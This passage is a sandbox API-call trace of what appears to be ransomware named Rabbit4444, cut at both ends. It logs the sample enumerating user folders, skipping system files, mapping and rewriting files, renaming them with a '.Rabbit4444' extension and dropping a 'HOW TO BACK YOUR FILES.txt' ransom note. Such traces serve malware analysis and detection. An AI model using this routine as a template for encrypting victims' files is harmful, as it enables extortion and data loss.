hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.468] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15877861914) returned 1 [0067.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.468] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.469] CloseHandle (hObject=0x29c) returned 1 [0067.469] CloseHandle (hObject=0x280) returned 1 [0067.469] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt.Rabbit4444") returned 182 [0067.469] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3241a200, ftCreationTime.dwHighDateTime=0x1d196ee, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3241a200, ftLastWriteTime.dwHighDateTime=0x1d196ee, nFileSizeHigh=0x0, nFileSizeLow=0x12b16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settingssynonyms.txt", cAlternateFileName="SETTIN~3.TXT")) returned 0 [0067.470] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0067.470] lstrcpyW (in: lpString1=0x130ec66, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.470] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.470] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.470] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.471] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.471] CloseHandle (hObject=0x280) returned 1 [0067.471] CloseHandle (hObject=0x228) returned 1 [0067.472] GetCurrentThreadId () returned 0xd98 [0067.472] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0067.472] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}" [0067.472] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.472] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0067.472] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}" [0067.472] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\" [0067.472] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\.BFC0E91B00AE8A0620D3" [0067.472] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.478] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.481] FlushFileBuffers (hFile=0x228) returned 1 [0067.482] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.482] CloseHandle (hObject=0x228) returned 1 [0067.482] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}") returned 149 [0067.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.482] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x31247c5d, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf189f57b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0067.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.482] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.483] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.483] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.483] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aefe5fb, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x31247c5d, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf189f57b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.483] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.483] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.483] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.483] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.483] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.483] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf189f57b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf189f57b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf18c5856, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.483] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.483] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.483] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aeeb4d9, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x2aeeb4d9, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x2ee14d1f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x541a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.0.filtertrie.intermediate.txt", cAlternateFileName="00FILT~1.TXT")) returned 1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.483] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.483] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.0.filtertrie.intermediate.txt" | out: lpString1="0.0.filtertrie.intermediate.txt") returned="0.0.filtertrie.intermediate.txt" [0067.483] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.484] lstrlenW (lpString="0.0.filtertrie.intermediate.txt") returned 31 [0067.484] lstrlenW (lpString="Rabbit4444") returned 10 [0067.484] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.484] lstrlenW (lpString=".dll") returned 4 [0067.484] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.484] lstrlenW (lpString=".lnk") returned 4 [0067.484] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.484] lstrlenW (lpString=".ini") returned 4 [0067.484] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.484] lstrlenW (lpString=".sys") returned 4 [0067.484] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.485] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.485] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15879538094) returned 1 [0067.485] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21530) returned 1 [0067.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0067.485] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5720, lpName=0x0) returned 0x29c [0067.486] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5720) returned 0x70000 [0067.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.488] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15879904571) returned 1 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0067.488] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.489] CloseHandle (hObject=0x29c) returned 1 [0067.489] CloseHandle (hObject=0x280) returned 1 [0067.489] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.489] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.0.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.490] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ee14d1f, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x2ee14d1f, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x2f3256de, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.1.filtertrie.intermediate.txt", cAlternateFileName="01FILT~1.TXT")) returned 1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.490] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.490] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.1.filtertrie.intermediate.txt" | out: lpString1="0.1.filtertrie.intermediate.txt") returned="0.1.filtertrie.intermediate.txt" [0067.490] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.491] lstrlenW (lpString="0.1.filtertrie.intermediate.txt") returned 31 [0067.491] lstrlenW (lpString="Rabbit4444") returned 10 [0067.491] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.491] lstrlenW (lpString=".dll") returned 4 [0067.491] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.491] lstrlenW (lpString=".lnk") returned 4 [0067.491] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.491] lstrlenW (lpString=".ini") returned 4 [0067.491] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.491] lstrlenW (lpString=".sys") returned 4 [0067.491] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.491] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.491] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15880208677) returned 1 [0067.491] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.491] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0067.492] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.493] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.495] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.495] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0067.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0067.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.496] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15880645562) returned 1 [0067.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.496] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0067.496] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.496] CloseHandle (hObject=0x29c) returned 1 [0067.496] CloseHandle (hObject=0x280) returned 1 [0067.496] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.496] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{f1570acd-4e55-4c06-9654-bc576225a4c1}\\0.1.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.497] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3256de, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x2f3256de, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x2f3256de, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.2.filtertrie.intermediate.txt", cAlternateFileName="02FILT~1.TXT")) returned 1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.497] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", 